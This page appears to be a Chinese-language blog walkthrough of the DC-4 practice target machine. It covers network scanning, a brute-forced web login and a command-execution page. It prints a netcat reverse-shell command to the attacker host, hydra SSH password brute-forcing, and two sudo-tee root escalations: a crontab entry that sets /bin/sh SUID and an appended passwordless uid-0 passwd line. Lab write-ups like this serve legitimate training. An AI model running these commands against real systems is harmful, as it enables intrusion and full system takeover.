<!DOCTYPE html><html lang="zh-CN"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="format-detection" content="telephone=no"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-status-bar-style" content="black"><link rel="icon" href="/images/icons/favicon-16x16.png?v=2.6.2" type="image/png" sizes="16x16"><link rel="icon" href="/images/icons/favicon-32x32.png?v=2.6.2" type="image/png" sizes="32x32"><meta name="description" content="信息搜集       我配置的网络是桥接的，都在192.168.0.1&#x2F;24这个网段下。">
<meta property="og:type" content="article">
<meta property="og:title" content="DC:4">
<meta property="og:url" content="http://yaoa.cool/2021/02/23/DC-4/index.html">
<meta property="og:site_name" content="Ya0a">
<meta property="og:description" content="信息搜集       我配置的网络是桥接的，都在192.168.0.1&#x2F;24这个网段下。">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://yaoa.cool/images/DC-4/image-20210223213227079.png">
<meta property="og:image" content="http://yaoa.cool/images/DC-4/image-20210223213500962.png">
<meta property="og:image" content="http://yaoa.cool/images/DC-4/image-20210223214637556.png">
<meta property="og:image" content="http://yaoa.cool/images/DC-4/image-20210223214849093.png">
<meta property="og:image" content="http://yaoa.cool/images/DC-4/image-20210223215239105.png">
<meta property="og:image" content="http://yaoa.cool/images/DC-4/image-20210223215326024.png">
<meta property="og:image" content="http://yaoa.cool/images/DC-4/image-20210223215840067.png">
<meta property="og:image" content="http://yaoa.cool/images/DC-4/image-20210223221940520.png">
<meta property="article:published_time" content="2021-02-23T13:25:04.000Z">
<meta property="article:modified_time" content="2021-02-23T14:22:35.988Z">
<meta property="article:author" content="Ya0a">
<meta property="article:tag" content="靶场">
<meta property="article:tag" content="渗透">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://yaoa.cool/images/DC-4/image-20210223213227079.png"><title>DC:4 | Ya0a</title><link ref="canonical" href="http://yaoa.cool/2021/02/23/DC-4/"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.12.1/css/all.min.css" type="text/css"><link rel="stylesheet" href="/css/index.css?v=2.6.2"><script>var Stun = window.Stun || {};
var CONFIG = {
  root: '/',
  algolia: undefined,
  assistSearch: undefined,
  fontIcon: {"prompt":{"success":"fas fa-check-circle","info":"fas fa-arrow-circle-right","warning":"fas fa-exclamation-circle","error":"fas fa-times-circle"},"copyBtn":"fas fa-copy"},
  sidebar: {"offsetTop":"20px","tocMaxDepth":6},
  header: {"enable":true,"showOnPost":true,"scrollDownIcon":false},
  postWidget: {"endText":true},
  nightMode: {"enable":true},
  back2top: {"enable":true},
  codeblock: {"style":"default","highlight":"ocean","wordWrap":true},
  reward: false,
  fancybox: false,
  zoomImage: {"gapAside":"20px"},
  galleryWaterfall: undefined,
  lazyload: false,
  pjax: undefined,
  externalLink: {"icon":{"enable":true,"name":"fas fa-external-link-alt"}},
  shortcuts: undefined,
  prompt: {"copyButton":"复制","copySuccess":"复制成功","copyError":"复制失败"},
  sourcePath: {"js":"js","css":"css","images":"images"},
};

window.CONFIG = CONFIG;</script><meta name="generator" content="Hexo 5.3.0"></head><body><div class="container" id="container"><header class="header" id="header"><div class="header-inner"><nav class="header-nav header-nav--fixed"><div class="header-nav-inner"><div class="header-nav-menubtn"><i class="fas fa-bars"></i></div><div class="header-nav-menu"><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/"><span class="header-nav-menu-item__icon"><i class="fas fa-home"></i></span><span class="header-nav-menu-item__text">首页</span></a></div><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/archives/"><span class="header-nav-menu-item__icon"><i class="fas fa-folder-open"></i></span><span class="header-nav-menu-item__text">归档</span></a></div><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/categories/"><span class="header-nav-menu-item__icon"><i class="fas fa-layer-group"></i></span><span class="header-nav-menu-item__text">分类</span></a></div><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/tags/"><span class="header-nav-menu-item__icon"><i class="fas fa-tags"></i></span><span class="header-nav-menu-item__text">标签</span></a></div><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/about/"><span class="header-nav-menu-item__icon"><i class="fas fa-folder-open"></i></span><span class="header-nav-menu-item__text">关于</span></a></div></div><div class="header-nav-mode"><div class="mode"><div class="mode-track"><span class="mode-track-moon"></span><span class="mode-track-sun"></span></div><div class="mode-thumb"></div></div></div></div></nav><div class="header-banner"><div class="header-banner-info"><div class="header-banner-info__title">Ya0a</div><div class="header-banner-info__subtitle">痛定思痛</div></div></div></div></header><main class="main" id="main"><div class="main-inner"><div class="content-wrap" id="content-wrap"><div class="content" id="content"><!-- Just used to judge whether it is an article page--><div id="is-post"></div><div class="post"><header class="post-header"><h1 class="post-title">DC:4</h1><div class="post-meta"><span class="post-meta-item post-meta-item--createtime"><span class="post-meta-item__icon"><i class="far fa-calendar-plus"></i></span><span class="post-meta-item__info">发表于</span><span class="post-meta-item__value">2021-02-23</span></span><span class="post-meta-item post-meta-item--updatetime"><span class="post-meta-item__icon"><i class="far fa-calendar-check"></i></span><span class="post-meta-item__info">更新于</span><span class="post-meta-item__value">2021-02-23</span></span></div></header><div class="post-body">
        <h1 id="信息搜集"   >
          <a href="#信息搜集" class="heading-link"><i class="fas fa-link"></i></a><a href="#信息搜集" class="headerlink" title="信息搜集"></a>信息搜集</h1>
      <p>我配置的网络是桥接的，都在192.168.0.1/24这个网段下。</p>
<a id="more"></a>

<figure class="highlight plain"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">root@kali:~&#x2F;桌面# nmap -sn  192.168.0.1&#x2F;24</span><br><span class="line">Starting Nmap 7.91 ( https:&#x2F;&#x2F;nmap.org ) at 2021-02-23 21:27 CST</span><br><span class="line">Nmap scan report for 192.168.0.1</span><br><span class="line">Host is up (0.0033s latency).</span><br><span class="line">MAC Address: 04:95:E6:0A:B3:00 (Tenda Technology,Ltd.Dongguan branch)</span><br><span class="line">Nmap scan report for 192.168.0.151</span><br><span class="line">Host is up (0.000099s latency).</span><br><span class="line">MAC Address: 00:0C:29:2C:75:61 (VMware)</span><br><span class="line">Nmap scan report for 192.168.0.200</span><br><span class="line">Host is up (0.00025s latency).</span><br><span class="line">MAC Address: 30:C9:AB:34:54:38 (Cloud Network Technology Singapore PTE.)</span><br><span class="line">Nmap scan report for 192.168.0.164</span><br><span class="line">Host is up.</span><br><span class="line">Nmap done: 256 IP addresses (4 hosts up) scanned in 2.06 seconds</span><br><span class="line"></span><br></pre></td></tr></table></div></figure>
<p>可以看到靶机的ip是<code>192.168.0.151</code>,继续扫端口</p>
<figure class="highlight plain"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">root@kali:~&#x2F;桌面# nmap -sS -sV 192.168.0.151</span><br><span class="line">Starting Nmap 7.91 ( https:&#x2F;&#x2F;nmap.org ) at 2021-02-23 21:29 CST</span><br><span class="line">Nmap scan report for 192.168.0.151</span><br><span class="line">Host is up (0.000073s latency).</span><br><span class="line">Not shown: 998 closed ports</span><br><span class="line">PORT   STATE SERVICE VERSION</span><br><span class="line">22&#x2F;tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)</span><br><span class="line">80&#x2F;tcp open  http    nginx 1.15.10</span><br><span class="line">MAC Address: 00:0C:29:2C:75:61 (VMware)</span><br><span class="line">Service Info: OS: Linux; CPE: cpe:&#x2F;o:linux:linux_kernel</span><br></pre></td></tr></table></div></figure>
<p>只开了一个80和22。基本上就是web入口找字典，爆破ssh了。</p>

        <h1 id="web入口"   >
          <a href="#web入口" class="heading-link"><i class="fas fa-link"></i></a><a href="#web入口" class="headerlink" title="web入口"></a>web入口</h1>
      <p><img src="/images/DC-4/image-20210223213227079.png" alt="image-20210223213227079"></p>
<p>一个登陆界面，测试没有注入。</p>
<p>那就先上个10万的小字典试试吧！！！！</p>
<p><img src="/images/DC-4/image-20210223213500962.png" alt="image-20210223213500962"></p>
<p>登陆的时候有一个302，用burp要跟踪一下，要不回显都一样。</p>
<p>登陆成功后时候一个可以rce的页面</p>
<p><img src="/images/DC-4/image-20210223214637556.png" alt="image-20210223214637556"></p>
<p>直接回弹shell</p>
<figure class="highlight plain"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nc 192.168.0.164 2333 -t -e &#x2F;bin&#x2F;bash</span><br></pre></td></tr></table></div></figure>
<p><img src="/images/DC-4/image-20210223214849093.png" alt="image-20210223214849093"></p>
<p>啪的一下，很快啊，拿shell这一部分就结束了。</p>

        <h1 id="提权"   >
          <a href="#提权" class="heading-link"><i class="fas fa-link"></i></a><a href="#提权" class="headerlink" title="提权"></a>提权</h1>
      <p>先打开一个交互式的shell</p>
<figure class="highlight plain"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python -c &quot;import pty;pty.spawn(&#39;&#x2F;bin&#x2F;sh&#39;)&quot;</span><br></pre></td></tr></table></div></figure>
<p><img src="/images/DC-4/image-20210223215239105.png" alt="image-20210223215239105"></p>
<p>查看系统中的用户</p>
<p><img src="/images/DC-4/image-20210223215326024.png" alt="image-20210223215326024"></p>
<p>进入jim的目录</p>
<p><img src="/images/DC-4/image-20210223215840067.png" alt="image-20210223215840067"></p>
<p>有一个mbox文件，目前没有权限打开。</p>
<p>发现了一个密码备份文件，懂了，爆破。</p>
<figure class="highlight plain"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">root@kali:~&#x2F;桌面# hydra -l jim -P 4.txt -vV -e ns 192.168.0.151 ssh</span><br></pre></td></tr></table></div></figure>
<p>密码：<code>jibril04</code></p>
<p>ssh连接后，打开mbox文件</p>
<figure class="highlight plain"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">jim@dc-4:~$ cat mbox</span><br><span class="line">From root@dc-4 Sat Apr 06 20:20:04 2019</span><br><span class="line">Return-path: &lt;root@dc-4&gt;</span><br><span class="line">Envelope-to: jim@dc-4</span><br><span class="line">Delivery-date: Sat, 06 Apr 2019 20:20:04 +1000</span><br><span class="line">Received: from root by dc-4 with local (Exim 4.89)</span><br><span class="line">        (envelope-from &lt;root@dc-4&gt;)</span><br><span class="line">        id 1hCiQe-0000gc-EC</span><br><span class="line">        for jim@dc-4; Sat, 06 Apr 2019 20:20:04 +1000</span><br><span class="line">To: jim@dc-4</span><br><span class="line">Subject: Test</span><br><span class="line">MIME-Version: 1.0</span><br><span class="line">Content-Type: text&#x2F;plain; charset&#x3D;&quot;UTF-8&quot;</span><br><span class="line">Content-Transfer-Encoding: 8bit</span><br><span class="line">Message-Id: &lt;E1hCiQe-0000gc-EC@dc-4&gt;</span><br><span class="line">From: root &lt;root@dc-4&gt;</span><br><span class="line">Date: Sat, 06 Apr 2019 20:20:04 +1000</span><br><span class="line">Status: RO</span><br><span class="line"></span><br><span class="line">This is a test.</span><br><span class="line"></span><br></pre></td></tr></table></div></figure>
<p>是一个邮件。</p>
<p>看一下jim的邮件</p>
<figure class="highlight plain"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line">jim@dc-4:~$ cat &#x2F;var&#x2F;mail&#x2F;jim</span><br><span class="line">From charles@dc-4 Sat Apr 06 21:15:46 2019</span><br><span class="line">Return-path: &lt;charles@dc-4&gt;</span><br><span class="line">Envelope-to: jim@dc-4</span><br><span class="line">Delivery-date: Sat, 06 Apr 2019 21:15:46 +1000</span><br><span class="line">Received: from charles by dc-4 with local (Exim 4.89)</span><br><span class="line">        (envelope-from &lt;charles@dc-4&gt;)</span><br><span class="line">        id 1hCjIX-0000kO-Qt</span><br><span class="line">        for jim@dc-4; Sat, 06 Apr 2019 21:15:45 +1000</span><br><span class="line">To: jim@dc-4</span><br><span class="line">Subject: Holidays</span><br><span class="line">MIME-Version: 1.0</span><br><span class="line">Content-Type: text&#x2F;plain; charset&#x3D;&quot;UTF-8&quot;</span><br><span class="line">Content-Transfer-Encoding: 8bit</span><br><span class="line">Message-Id: &lt;E1hCjIX-0000kO-Qt@dc-4&gt;</span><br><span class="line">From: Charles &lt;charles@dc-4&gt;</span><br><span class="line">Date: Sat, 06 Apr 2019 21:15:45 +1000</span><br><span class="line">Status: O</span><br><span class="line"></span><br><span class="line">Hi Jim,</span><br><span class="line"></span><br><span class="line">I&#39;m heading off on holidays at the end of today, so the boss asked me to give you my password just in case anything goes wrong.</span><br><span class="line"></span><br><span class="line">Password is:  ^xHhA&amp;hvim0y</span><br><span class="line"></span><br><span class="line">See ya,</span><br><span class="line">Charles</span><br></pre></td></tr></table></div></figure>
<p>得到了<code>charles</code>的密码。</p>
<p>登录后看一下他的sudo权限</p>
<figure class="highlight plain"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">charles@dc-4:~$ sudo -l</span><br><span class="line">Matching Defaults entries for charles on dc-4:</span><br><span class="line">    env_reset, mail_badpass, secure_path&#x3D;&#x2F;usr&#x2F;local&#x2F;sbin\:&#x2F;usr&#x2F;local&#x2F;bin\:&#x2F;usr&#x2F;sbin\:&#x2F;usr&#x2F;bin\:&#x2F;sbin\:&#x2F;bin</span><br><span class="line"></span><br><span class="line">User charles may run the following commands on dc-4:</span><br><span class="line">    (root) NOPASSWD: &#x2F;usr&#x2F;bin&#x2F;teehee</span><br></pre></td></tr></table></div></figure>
<p>这个<code>teehee</code>可以root权限无密码执行。</p>
<figure class="highlight plain"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">charles@dc-4:~$ teehee --help</span><br><span class="line">Usage: teehee [OPTION]... [FILE]...</span><br><span class="line">Copy standard input to each FILE, and also to standard output.</span><br><span class="line"></span><br><span class="line">  -a, --append              append to the given FILEs, do not overwrite</span><br><span class="line">  -i, --ignore-interrupts   ignore interrupt signals</span><br><span class="line">  -p                        diagnose errors writing to non pipes</span><br><span class="line">      --output-error[&#x3D;MODE]   set behavior on write error.  See MODE below</span><br><span class="line">      --help     display this help and exit</span><br><span class="line">      --version  output version information and exit</span><br><span class="line"></span><br><span class="line">MODE determines behavior with write errors on the outputs:</span><br><span class="line">  &#39;warn&#39;         diagnose errors writing to any output</span><br><span class="line">  &#39;warn-nopipe&#39;  diagnose errors writing to any output not a pipe</span><br><span class="line">  &#39;exit&#39;         exit on error writing to any output</span><br><span class="line">  &#39;exit-nopipe&#39;  exit on error writing to any output not a pipe</span><br><span class="line">The default MODE for the -p option is &#39;warn-nopipe&#39;.</span><br><span class="line">The default operation when --output-error is not specified, is to</span><br><span class="line">exit immediately on error writing to a pipe, and diagnose errors</span><br><span class="line">writing to non pipe outputs.</span><br><span class="line"></span><br></pre></td></tr></table></div></figure>
<p>看说明，是将标准输出重定向到其他文件，这里提权就有了。</p>
<p>两种方法：</p>
<ul>
<li>通过teehee写入计划任务，给/bin/sh加一个suid权限。</li>
<li>直接往passwd写一个uid是0的用户。</li>
</ul>

        <h3 id="第一种"   >
          <a href="#第一种" class="heading-link"><i class="fas fa-link"></i></a><a href="#第一种" class="headerlink" title="第一种"></a>第一种</h3>
      <figure class="highlight shell"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">sudo teehee /etc/crontab</span><br><span class="line">* * * * * root chmod 4777 /bin/sh</span><br></pre></td></tr></table></div></figure>
<figure class="highlight shell"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/bin/sh</span><br></pre></td></tr></table></div></figure>
<p>执行后就是root权限。</p>

        <h3 id="第二种"   >
          <a href="#第二种" class="heading-link"><i class="fas fa-link"></i></a><a href="#第二种" class="headerlink" title="第二种"></a>第二种</h3>
      <figure class="highlight shell"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">echo &quot;yaoa::0:0:::/bin/bash&quot;|sudo teehee -a /etc/passwd</span><br></pre></td></tr></table></div></figure>
<p>切换到yaoa，就是root权限</p>

        <h1 id="拿flag"   >
          <a href="#拿flag" class="heading-link"><i class="fas fa-link"></i></a><a href="#拿flag" class="headerlink" title="拿flag"></a>拿flag</h1>
      <p><img src="/images/DC-4/image-20210223221940520.png" alt="image-20210223221940520"></p>
</div><footer class="post-footer"><div class="post-ending ending"><div class="ending__text">------ 本文结束，感谢您的阅读 ------</div></div><div class="post-copyright copyright"><div class="copyright-author"><span class="copyright-author__name">本文作者: </span><span class="copyright-author__value"><a href="http://yaoa.cool">Ya0a</a></span></div><div class="copyright-link"><span class="copyright-link__name">本文链接: </span><span class="copyright-link__value"><a href="http://yaoa.cool/2021/02/23/DC-4/">http://yaoa.cool/2021/02/23/DC-4/</a></span></div><div class="copyright-notice"><span class="copyright-notice__name">版权声明: </span><span class="copyright-notice__value">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.en" rel="external nofollow" target="_blank">BY-NC-SA</a> 许可协议。转载请注明出处！</span></div></div><div class="post-tags"><span class="post-tags-item"><span class="post-tags-item__icon"><i class="fas fa-tag"></i></span><a class="post-tags-item__link" href="http://yaoa.cool/tags/%E9%9D%B6%E5%9C%BA/">靶场</a></span><span class="post-tags-item"><span class="post-tags-item__icon"><i class="fas fa-tag"></i></span><a class="post-tags-item__link" href="http://yaoa.cool/tags/%E6%B8%97%E9%80%8F/">渗透</a></span></div><nav class="post-paginator paginator"><div class="paginator-prev"><a class="paginator-prev__link" href="/2021/02/27/python%E8%A3%85%E9%A5%B0%E5%99%A8/"><span class="paginator-prev__icon"><i class="fas fa-angle-left"></i></span><span class="paginator-prev__text">python装饰器</span></a></div><div class="paginator-next"><a class="paginator-next__link" href="/2021/02/23/linux%E6%9D%83%E9%99%90/"><span class="paginator-prev__text">linux权限</span><span class="paginator-next__icon"><i class="fas fa-angle-right"></i></span></a></div></nav></footer></div></div></div><div class="sidebar-wrap" id="sidebar-wrap"><aside class="sidebar" id="sidebar"><div class="sidebar-nav"><span class="sidebar-nav-toc current">文章目录</span><span class="sidebar-nav-ov">站点概览</span></div><section class="sidebar-toc"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E4%BF%A1%E6%81%AF%E6%90%9C%E9%9B%86"><span class="toc-number">1.</span> <span class="toc-text">
          信息搜集</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#web%E5%85%A5%E5%8F%A3"><span class="toc-number">2.</span> <span class="toc-text">
          web入口</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%8F%90%E6%9D%83"><span class="toc-number">3.</span> <span class="toc-text">
          提权</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%AC%AC%E4%B8%80%E7%A7%8D"><span class="toc-number">3.0.1.</span> <span class="toc-text">
          第一种</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%AC%AC%E4%BA%8C%E7%A7%8D"><span class="toc-number">3.0.2.</span> <span class="toc-text">
          第二种</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%8B%BFflag"><span class="toc-number">4.</span> <span class="toc-text">
          拿flag</span></a></li></ol></section><!-- ov = overview--><section class="sidebar-ov hide"><div class="sidebar-ov-author"><div class="sidebar-ov-author__avatar"><img class="sidebar-ov-author__avatar_img" src="/images/icons/head.png" alt="avatar"></div><p class="sidebar-ov-author__text">痛定思痛</p></div><div class="sidebar-ov-social"><a class="sidebar-ov-social-item" href="tencent://message?uin=1755371745" target="_blank" rel="noopener" data-popover="QQ" data-popover-pos="up"><span class="sidebar-ov-social-item__icon"><i class="fab fa-qq"></i></span></a></div><div class="sidebar-ov-state"><a class="sidebar-ov-state-item sidebar-ov-state-item--posts" href="/archives/"><div class="sidebar-ov-state-item__count">25</div><div class="sidebar-ov-state-item__name">归档</div></a><a class="sidebar-ov-state-item sidebar-ov-state-item--categories" href="/categories/"><div class="sidebar-ov-state-item__count">7</div><div class="sidebar-ov-state-item__name">分类</div></a><a class="sidebar-ov-state-item sidebar-ov-state-item--tags" href="/tags/"><div class="sidebar-ov-state-item__count">11</div><div class="sidebar-ov-state-item__name">标签</div></a></div><div class="sidebar-ov-cc"><a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.en" target="_blank" rel="noopener" data-popover="知识共享许可协议" data-popover-pos="up"><img src="/images/cc-by-nc-sa.svg"></a></div></section><div class="sidebar-reading"><div class="sidebar-reading-info"><span class="sidebar-reading-info__text">你已阅读了 </span><span class="sidebar-reading-info__num">0</span><span class="sidebar-reading-info__perc">%</span></div><div class="sidebar-reading-line"></div></div></aside></div><div class="clearfix"></div></div></main><footer class="footer" id="footer"><div class="footer-inner"><div><span>Copyright © 2021</span><span class="footer__icon"><i class="fas fa-heart"></i></span><span>Ya0a</span></div><div><span>由 <a href="http://hexo.io/" title="Hexo" target="_blank" rel="noopener">Hexo</a> 强力驱动</span><span> v5.3.0</span><span class="footer__devider">|</span><span>主题 - <a href="https://github.com/liuyib/hexo-theme-stun/" title="Stun" target="_blank" rel="noopener">Stun</a></span><span> v2.6.2</span></div></div></footer><div class="loading-bar" id="loading-bar"><div class="loading-bar__progress"></div></div><div class="back2top" id="back2top"><span class="back2top__icon"><i class="fas fa-rocket"></i></span></div></div><script src="https://cdn.jsdelivr.net/npm/jquery@v3.4.1/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@1.5.2/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@1.5.2/velocity.ui.min.js"></script><script src="/js/utils.js?v=2.6.2"></script><script src="/js/stun-boot.js?v=2.6.2"></script><script src="/js/scroll.js?v=2.6.2"></script><script src="/js/header.js?v=2.6.2"></script><script src="/js/sidebar.js?v=2.6.2"></script></body></html>